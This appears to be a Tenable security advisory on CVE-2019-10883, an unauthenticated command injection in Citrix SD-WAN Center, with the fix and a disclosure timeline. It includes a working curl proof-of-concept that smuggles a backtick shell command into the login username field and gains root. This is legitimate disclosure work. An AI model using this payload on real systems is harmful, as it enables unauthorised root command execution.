Citrix SD-WAN Center and NetScaler SD-WAN Center Unauthenticated Remote Command Injection(CVE-2019-10883 )

### Synopsis While developing a Nessus plugin for CVE-2017-6316, Tenable found an unauthenticated remote operating system command injection vulnerability in Citrix SD-WAN Center 10.2.0.136.733315. The vulnerability appears to be in /home/talariuser/www/app/Controller/UsersController.php. The controller has insufficient validation of user-supplied data ($username). An unauthenticated remote attacker can use the following CURL command to run arbitrary OS commands on the remote host: ``` curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login' ``` With command output: ``` root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test uid=0(root) gid=0(root) groups=0(root) ``` ### Solution Upgrade NetScaler SD-WAN Center to 10.0.7 or newer. Upgrade Citrix SD-WAN Center to 10.2.1 or newer. Follow Citrix's security best practices to further enhance your security posture. ### Additional References https://support.citrix.com/article/CTX247737 ### Disclosure Timeline * 01/28/19 - Vulnerability discovered. * 02/07/19 - Tenable reported to secure@citrix.com via encrypted email. 90 days is May 9th. * 02/08/19 - Citrix acknowledges and asks for Tenable's public key. * 02/08/19 - Tenable sends a public key. * 02/26/19 - Citrix acknowledges they've reproduced the vulnerability. * 02/26/19 - Tenable thanks Citrix. * 04/03/19 - Tenable asks Citrix for an update. * 04/04/19 - Citrix indicates they are getting a CVE assigned and a bulletin ready. Asks Tenable who to credit. * 04/04/19 - Tenable says "Tenable, Inc." and offers to assign the CVE. * 04/08/19 - Citrix indicates April 10th is the disclosure date and notes they already have a CVE allocated. * 04/08/19 - Tenable asks for a copy of the draft bulletin or CVE assignment. * 04/08/19 - Citrix assigned CVE-2019-10883. Can't share bulletin. * 04/08/19 - Tenable thanks Citrix. * 04/10/19 - Citrix notifies Tenable of publication and thanks Tenable. * 04/10/19 - Tenable thanks Citrix.